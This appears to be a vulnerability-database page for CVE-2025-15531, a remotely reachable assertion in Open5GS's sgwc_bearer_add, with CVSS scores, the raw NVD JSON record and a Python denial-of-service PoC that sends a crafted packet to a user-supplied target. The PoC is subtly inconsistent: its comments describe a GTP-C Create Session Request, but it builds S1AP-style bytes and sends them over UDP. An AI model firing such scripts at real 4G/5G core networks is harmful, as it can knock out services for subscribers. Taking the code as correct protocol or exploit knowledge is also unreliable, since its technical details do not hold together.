Security Vulnerability Report
CVE-2025-15531 CVSS 5.3 MEDIUM

Published: 2026-01-17 16:16:05
Last Modified: 2026-02-23 09:16:28

Description

A vulnerability was identified in Open5GS up to 2.7.5. It affects the function sgwc_bearer_add in the file src/sgwc/context.c. The manipulation leads to a reachable assertion. The attack can be carried out remotely. The exploit is publicly available and might be used. The issue report is flagged as already-fixed.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:* - VULNERABLE
Open5GS < 2.7.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-15531 PoC - Open5GS SGWC Bearer Add Assertion
# Target: Open5GS <= 2.7.5
# Type: Denial of Service via Reachable Assertion
# This PoC demonstrates triggering the assertion in sgwc_bearer_add
# by sending a crafted Create Session Request with invalid bearer parameters
import socket
import struct
import sys


def create_crafted_s1ap_message():
    """Generate a crafted S1AP message to trigger sgwc_bearer_add assertion"""
    # S1AP message header
    protocol_id = 0x00  # S1AP
    procedure_code = 0x0d  # Initial Context Setup Request / Bearer establishment

    # Construct message with malformed bearer information
    message = bytearray()

    # MME UE S1AP ID
    message.extend([0x00, 0x0f])  # IEI for MME UE S1AP ID
    message.extend([0x00, 0x04])  # Length
    message.extend([0x00, 0x00, 0x00, 0x01])  # UE ID value

    # eNB UE S1AP ID
    message.extend([0x00, 0x10])  # IEI for eNB UE S1AP ID
    message.extend([0x00, 0x04])  # Length
    message.extend([0x00, 0x00, 0x00, 0x02])  # UE ID value

    # Data Radio Bearer ID (crafted for assertion trigger)
    message.extend([0x00, 0x57])  # IEI for Data Radio Bearer ID
    message.extend([0x00, 0x01])  # Length
    message.extend([0x00])  # Invalid/zero bearer ID to trigger assertion

    # E-RAB ID List (malformed)
    message.extend([0x00, 0x5b])  # IEI for E-RAB to Be Setup List
    message.extend([0x00, 0x10])  # Length
    message.extend([0x00, 0x01, 0x00, 0x0c])  # E-RAB ID: 1
    message.extend([0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00])

    return bytes(message)


def send_exploit(target_ip, target_port=36412):
    """Send crafted packet to Open5GS SGWC"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    payload = create_crafted_s1ap_message()
    try:
        sock.sendto(payload, (target_ip, target_port))
        print(f"[+] Crafted packet sent to {target_ip}:{target_port}")
        print(f"[+] Payload length: {len(payload)} bytes")
        print("[*] Expected result: Open5GS sgwc_bearer_add assertion failure")
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        sock.close()


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-15531.py <target_ip>")
        sys.exit(1)
    send_exploit(sys.argv[1])
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15531", "sourceIdentifier": "[email protected]", "published": "2026-01-17T16:16:05.003", "lastModified": "2026-02-23T09:16:28.097", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in Open5GS up to 2.7.5. This vulnerability affects the function sgwc_bearer_add of the file src/sgwc/context.c. The manipulation leads to reachable assertion. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. The issue report is flagged as already-fixed."}, {"lang": "es", "value": "Una vulnerabilidad fue identificada en Open5GS hasta 2.7.5. Esta vulnerabilidad afecta a la función sgwc_bearer_add del archivo src/sgwc/context.c. La manipulación conduce a una aserción alcanzable. El ataque es posible de llevar a cabo remotamente. El exploit está disponible públicamente y podría ser usado. El informe del problema está marcado como ya solucionado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": 
"NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-617"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.7.5", "matchCriteriaId": "7D0FBF91-87F5-4984-AC37-744D9BFC13C0"}]}]}], "references": [{"url": 
"https://github.com/open5gs/open5gs/", "source": "[email protected]"}, {"url": "https://github.com/open5gs/open5gs/issues/4233", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/open5gs/open5gs/issues/4233#issue-3776216182", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://vuldb.com/?ctiid.341598", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.341598", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.729339", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}